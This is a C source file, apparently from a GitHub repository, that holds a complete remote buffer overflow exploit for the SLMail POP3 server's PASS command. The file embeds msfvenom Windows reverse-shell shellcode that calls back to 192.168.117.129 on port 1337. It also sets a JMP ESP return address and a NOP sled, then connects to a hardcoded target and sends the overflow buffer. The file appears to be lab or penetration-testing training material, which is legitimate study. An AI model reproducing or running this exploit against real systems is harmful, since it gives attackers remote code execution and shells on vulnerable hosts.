-
Notifications
You must be signed in to change notification settings - Fork 61
/
643-fixed.c
99 lines (91 loc) · 3.32 KB
/
643-fixed.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
//#define retadd "\x8f\x35\x4a\x5f" /*JMP ESP in SLMFC.DLL 0x5f4a358f*/
#define retadd "\x8f\x35\x4a\x5f"
#define port 110
/* msfvenom --arch x86 -p windows/shell_reverse_tcp LHOST=192.168.117.129 R LPORT=1337 -b '\x00\x0a\x0d' -f c */
//unsigned char shellcode[] =
unsigned char shellcode[] =
"\xbb\xc8\x2e\xb1\xfa\xdb\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x5a\x12\x83\xc2\x04\x03\x92\x20\x53\x0f\xde\xd5\x11"
"\xf0\x1e\x26\x76\x78\xfb\x17\xb6\x1e\x88\x08\x06\x54\xdc\xa4"
"\xed\x38\xf4\x3f\x83\x94\xfb\x88\x2e\xc3\x32\x08\x02\x37\x55"
"\x8a\x59\x64\xb5\xb3\x91\x79\xb4\xf4\xcc\x70\xe4\xad\x9b\x27"
"\x18\xd9\xd6\xfb\x93\x91\xf7\x7b\x40\x61\xf9\xaa\xd7\xf9\xa0"
"\x6c\xd6\x2e\xd9\x24\xc0\x33\xe4\xff\x7b\x87\x92\x01\xad\xd9"
"\x5b\xad\x90\xd5\xa9\xaf\xd5\xd2\x51\xda\x2f\x21\xef\xdd\xf4"
"\x5b\x2b\x6b\xee\xfc\xb8\xcb\xca\xfd\x6d\x8d\x99\xf2\xda\xd9"
"\xc5\x16\xdc\x0e\x7e\x22\x55\xb1\x50\xa2\x2d\x96\x74\xee\xf6"
"\xb7\x2d\x4a\x58\xc7\x2d\x35\x05\x6d\x26\xd8\x52\x1c\x65\xb5"
"\x97\x2d\x95\x45\xb0\x26\xe6\x77\x1f\x9d\x60\x34\xe8\x3b\x77"
"\x3b\xc3\xfc\xe7\xc2\xec\xfc\x2e\x01\xb8\xac\x58\xa0\xc1\x26"
"\x98\x4d\x14\xe8\xc8\xe1\xc7\x49\xb8\x41\xb8\x21\xd2\x4d\xe7"
"\x52\xdd\x87\x80\xf9\x24\x40\x6f\x55\x53\x11\x07\xa4\x9b\x14"
"\xe1\x21\x7d\x7c\x01\x64\xd6\xe9\xb8\x2d\xac\x88\x45\xf8\xc9"
"\x8b\xce\x0f\x2e\x45\x27\x65\x3c\x32\xc7\x30\x1e\x95\xd8\xee"
"\x36\x79\x4a\x75\xc6\xf4\x77\x22\x91\x51\x49\x3b\x77\x4c\xf0"
"\x95\x65\x8d\x64\xdd\x2d\x4a\x55\xe0\xac\x1f\xe1\xc6\xbe\xd9"
"\xea\x42\xea\xb5\xbc\x1c\x44\x70\x17\xef\x3e\x2a\xc4\xb9\xd6"
"\xab\x26\x7a\xa0\xb3\x62\x0c\x4c\x05\xdb\x49\x73\xaa\x8b\x5d"
"\x0c\xd6\x2b\xa1\xc7\x52\x5b\xe8\x45\xf2\xf4\xb5\x1c\x46\x99"
"\x45\xcb\x85\xa4\xc5\xf9\x75\x53\xd5\x88\x70\x1f\x51\x61\x09"
"\x30\x34\x85\xbe\x31\x1d";
struct sockaddr_in plm,lar,target;
int conn(char *ip)
{
int sockfd;
plm.sin_family = AF_INET;
plm.sin_port = htons(port);
plm.sin_addr.s_addr = inet_addr(ip);
bzero(&(plm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
{
perror("[-] connect error!");
exit(0);
}
printf("[*] Connected to: %s.\n",ip);
return sockfd;
}
int main(int argc, char *argv[])
{
int xs;
char out[1024];
char *buffer = malloc(3500);
memset(buffer, 0x00, 3500);
char *off = malloc(2606);
memset(off, 0x00, 2606);
// memset(off, 0x41, 2605);
memset(off, 0x41, 2606);
// char *nop = malloc(16);
// memset(nop, 0x00, 13);
// memset(nop, 0x90, 12);
char *nop = malloc(8);
memset(nop, 0x00,8);
memset(nop, 0x90,8);
strcat(buffer, off);
strcat(buffer, retadd);
strcat(buffer, nop);
strcat(buffer, shellcode);
printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by TJnull.\n");
xs = conn("192.168.117.132");
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"USER username\r\n", 15);
read(xs, out, 1024);
printf("[*] %s", out);
write(xs,"PASS ",5);
write(xs,buffer,strlen(buffer));
printf("Shellcode len: %d bytes\n",strlen(shellcode));
printf("Buffer len: %d bytes\n",strlen(buffer));
write(xs,"\r\n",4);
close(xs);
}